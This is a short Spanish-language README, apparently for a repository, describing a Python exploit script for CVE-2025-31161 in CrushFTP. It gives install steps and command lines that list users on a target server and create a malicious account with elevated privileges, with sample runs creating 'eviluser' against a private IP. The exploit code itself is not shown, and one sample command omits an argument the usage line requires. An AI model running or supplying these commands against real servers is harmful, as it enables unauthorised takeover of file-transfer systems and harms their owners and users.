
Script de explotación en Python para CVE-2025-31161 dirigido a CrushFTP. Enumera usuarios y crea cuentas maliciosas con permisos elevados mediante peticiones HTTP.
Este repositorio contiene un script en Python para interactuar con el servicio CrushFTP vulnerable a CVE-2025-31161. El script permite listar usuarios existentes y agregar un usuario malicioso explotando la vulnerabilidad.
requestspip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234